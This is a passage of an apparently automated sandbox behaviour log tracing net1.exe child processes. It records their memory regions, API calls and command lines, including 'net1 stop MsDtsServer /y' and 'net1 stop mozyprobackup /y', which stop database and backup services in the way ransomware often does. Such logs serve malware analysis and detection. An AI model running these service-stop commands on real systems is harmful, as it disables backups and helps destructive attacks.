"pagefile_0x000000007efe0000" filename = "" Region: id = 6708 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6709 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6710 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6711 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6712 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6713 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6714 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6715 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6716 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6717 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6718 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6719 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6720 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6721 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6722 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6723 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6724 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6790 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 582 os_tid = 0x12a4 [0100.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fef0 | out: lpSystemTimeAsFileTime=0x24fef0*(dwLowDateTime=0xf1284a10, dwHighDateTime=0x1d48689)) [0100.635] GetCurrentProcessId () returned 0x127c [0100.635] GetCurrentThreadId () returned 0x12a4 [0100.635] GetTickCount () returned 0x22f0b [0100.635] QueryPerformanceCounter (in: lpPerformanceCount=0x24fef8 | out: lpPerformanceCount=0x24fef8*=1814755300000) returned 1 [0100.636] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000 [0100.637] __set_app_type (_Type=0x1) [0100.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe79c9c) returned 0x0 [0100.637] __getmainargs (in: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788, _DoWildCard=0, _StartInfo=0xffe8479c | out: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788) returned 0 [0100.637] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.637] GetConsoleOutputCP () returned 0x1b5 [0100.695] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe8cec0 | out: lpCPInfo=0xffe8cec0) returned 1 [0100.695] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.697] sprintf_s (in: _DstBuf=0x24fe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.697] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.698] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.698] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer /y" [0100.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.699] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.699] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fe88 | out: Buffer=0x24fe88*=0x454d50) returned 0x0 [0100.699] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fe88 | out: Buffer=0x24fe88*=0x45c100) returned 0x0 [0100.699] _fileno (_File=0x7fefdba2a80) returned 0 [0100.699] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.699] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.699] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.699] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.699] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.699] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.699] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.699] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.699] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.699] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.699] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.699] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.699] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.699] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.699] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.699] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.699] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.699] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.699] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.700] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.700] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.700] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.700] _wcsicmp (_String1="accounts", _String2="MsDtsServer") returned -12 [0100.700] _wcsicmp (_String1="computer", _String2="MsDtsServer") returned -10 [0100.700] _wcsicmp (_String1="config", _String2="MsDtsServer") returned -10 [0100.700] _wcsicmp (_String1="continue", _String2="MsDtsServer") returned -10 [0100.700] _wcsicmp (_String1="cont", _String2="MsDtsServer") returned -10 [0100.700] _wcsicmp (_String1="file", _String2="MsDtsServer") returned -7 [0100.700] _wcsicmp (_String1="files", _String2="MsDtsServer") returned -7 [0100.700] _wcsicmp (_String1="group", _String2="MsDtsServer") returned -6 [0100.700] _wcsicmp (_String1="groups", _String2="MsDtsServer") returned -6 [0100.700] _wcsicmp (_String1="help", _String2="MsDtsServer") returned -5 [0100.700] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer") returned -5 [0100.700] _wcsicmp (_String1="localgroup", _String2="MsDtsServer") returned -1 [0100.700] _wcsicmp (_String1="pause", _String2="MsDtsServer") returned 3 [0100.700] _wcsicmp (_String1="session", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="sessions", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="sess", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="share", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="start", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="stats", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="statistics", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="stop", _String2="MsDtsServer") returned 6 [0100.700] _wcsicmp (_String1="time", _String2="MsDtsServer") returned 7 [0100.700] _wcsicmp (_String1="user", _String2="MsDtsServer") returned 8 [0100.700] _wcsicmp (_String1="users", _String2="MsDtsServer") returned 8 [0100.700] _wcsicmp (_String1="msg", _String2="MsDtsServer") returned 3 [0100.700] _wcsicmp (_String1="messenger", _String2="MsDtsServer") returned -14 [0100.700] _wcsicmp (_String1="receiver", _String2="MsDtsServer") returned 5 [0100.700] _wcsicmp (_String1="rcv", _String2="MsDtsServer") returned 5 [0100.700] _wcsicmp (_String1="netpopup", _String2="MsDtsServer") returned 1 [0100.700] _wcsicmp (_String1="redirector", _String2="MsDtsServer") returned 5 [0100.700] _wcsicmp (_String1="redir", _String2="MsDtsServer") returned 5 [0100.700] _wcsicmp (_String1="rdr", _String2="MsDtsServer") returned 5 [0100.700] _wcsicmp (_String1="workstation", _String2="MsDtsServer") returned 10 [0100.700] _wcsicmp (_String1="work", _String2="MsDtsServer") returned 10 [0100.701] _wcsicmp (_String1="wksta", _String2="MsDtsServer") returned 10 [0100.701] _wcsicmp (_String1="prdr", _String2="MsDtsServer") returned 3 [0100.701] _wcsicmp (_String1="devrdr", _String2="MsDtsServer") returned -9 [0100.701] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer") returned -1 [0100.701] _wcsicmp (_String1="server", _String2="MsDtsServer") returned 6 [0100.701] _wcsicmp (_String1="svr", _String2="MsDtsServer") returned 6 [0100.701] _wcsicmp (_String1="srv", _String2="MsDtsServer") returned 6 [0100.701] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer") returned -1 [0100.701] _wcsicmp (_String1="alerter", _String2="MsDtsServer") returned -12 [0100.701] _wcsicmp (_String1="netlogon", _String2="MsDtsServer") returned 1 [0100.701] _wcsupr (in: _String="MsDtsServer" | out: _String="MSDTSSERVER") returned="MSDTSSERVER" [0100.701] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x45ce10 [0100.704] GetServiceKeyNameW (in: hSCManager=0x45ce10, lpDisplayName="MSDTSSERVER", lpServiceName=0xffe85750, lpcchBuffer=0x24fda8 | out: lpServiceName="", lpcchBuffer=0x24fda8) returned 0 [0100.705] _wcsicmp (_String1="msg", _String2="MSDTSSERVER") returned 3 [0100.705] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER") returned -14 [0100.705] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER") returned 5 [0100.705] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER") returned 5 [0100.705] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER") returned 5 [0100.705] _wcsicmp (_String1="redir", _String2="MSDTSSERVER") returned 5 [0100.705] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER") returned 5 [0100.705] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER") returned 10 [0100.705] _wcsicmp (_String1="work", _String2="MSDTSSERVER") returned 10 [0100.705] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER") returned 10 [0100.705] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER") returned 3 [0100.705] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER") returned -9 [0100.705] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER") returned -1 [0100.705] _wcsicmp (_String1="server", _String2="MSDTSSERVER") returned 6 [0100.705] _wcsicmp (_String1="svr", _String2="MSDTSSERVER") returned 6 [0100.705] _wcsicmp (_String1="srv", _String2="MSDTSSERVER") returned 6 [0100.705] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER") returned -1 [0100.705] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER") returned -12 [0100.705] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER") returned 1 [0100.705] NetServiceControl (in: servername=0x0, service="MSDTSSERVER", opcode=0x0, arg=0x0, bufptr=0x24fdb0 | out: bufptr=0x24fdb0) returned 0x889 [0100.706] wcscpy_s (in: _Destination=0xffe880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.706] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0100.707] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.708] GetFileType (hFile=0xb) returned 0x2 [0100.708] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc78 | out: lpMode=0x24fc78) returned 1 [0100.709] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24fc70, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x24fc70*=0x1e) returned 1 [0100.709] GetFileType (hFile=0xb) returned 0x2 [0100.709] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc78 | out: lpMode=0x24fc78) returned 1 [0100.709] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fc70, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x24fc70*=0x2) returned 1 [0100.710] _ultow (in: _Dest=0x889, _Radix=2424032 | out: _Dest=0x889) returned="2185" [0100.710] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.710] GetFileType (hFile=0xb) returned 0x2 [0100.710] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc78 | out: lpMode=0x24fc78) returned 1 [0100.710] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24fc70, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x24fc70*=0x34) returned 1 [0100.711] GetFileType (hFile=0xb) returned 0x2 [0100.711] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc78 | out: lpMode=0x24fc78) returned 1 [0100.711] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fc70, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x24fc70*=0x2) returned 1 [0100.711] NetApiBufferFree (Buffer=0x454d50) returned 0x0 [0100.712] NetApiBufferFree (Buffer=0x45c100) returned 0x0 [0100.712] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer /y" [0100.712] exit (_Code=2) Process: id = "155" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58cfd000" os_pid = "0x988" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "145" os_parent_pid = "0x1214" cmd_line = "C:\\Windows\\system32\\net1 stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6725 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6726 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6727 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6728 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6729 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6730 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6731 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6732 start_va = 0xffe60000 end_va = 0xffe92fff entry_point = 0xffe60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6733 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6734 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6735 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6736 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6737 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6738 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6739 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6740 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6741 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6742 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6743 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 6744 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6745 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6746 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6747 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6748 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6749 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6750 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6751 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6752 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6753 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6754 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6755 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6756 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6757 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6758 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6759 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6760 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6761 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6762 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6791 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 583 os_tid = 0x9b8 [0100.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f890 | out: lpSystemTimeAsFileTime=0x18f890*(dwLowDateTime=0xf12d0cd0, dwHighDateTime=0x1d48689)) [0100.668] GetCurrentProcessId () returned 0x988 [0100.668] GetCurrentThreadId () returned 0x9b8 [0100.668] GetTickCount () returned 0x22f2a [0100.668] QueryPerformanceCounter (in: lpPerformanceCount=0x18f898 | out: lpPerformanceCount=0x18f898*=1814758600000) returned 1 [0100.669] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000 [0100.669] __set_app_type (_Type=0x1) [0100.669] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe79c9c) returned 0x0 [0100.669] __getmainargs (in: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788, _DoWildCard=0, _StartInfo=0xffe8479c | out: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788) returned 0 [0100.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.670] GetConsoleOutputCP () returned 0x1b5 [0100.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe8cec0 | out: lpCPInfo=0xffe8cec0) returned 1 [0100.713] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.715] sprintf_s (in: _DstBuf=0x18f838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.715] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.717] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.717] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0100.717] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.717] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.717] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f828 | out: Buffer=0x18f828*=0x1d4d50) returned 0x0 [0100.717] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f828 | out: Buffer=0x18f828*=0x1dc100) returned 0x0 [0100.717] _fileno (_File=0x7fefdba2a80) returned 0 [0100.717] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.718] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.718] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.718] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.718] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.718] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.718] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.718] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.718] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.718] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.718] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.718] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.718] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.718] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.718] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.718] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.718] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.718] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.718] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.718] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.718] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.718] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.718] _wcsicmp (_String1="accounts", _String2="mozyprobackup") returned -12 [0100.718] _wcsicmp (_String1="computer", _String2="mozyprobackup") returned -10 [0100.718] _wcsicmp (_String1="config", _String2="mozyprobackup") returned -10 [0100.718] _wcsicmp (_String1="continue", _String2="mozyprobackup") returned -10 [0100.718] _wcsicmp (_String1="cont", _String2="mozyprobackup") returned -10 [0100.718] _wcsicmp (_String1="file", _String2="mozyprobackup") returned -7 [0100.718] 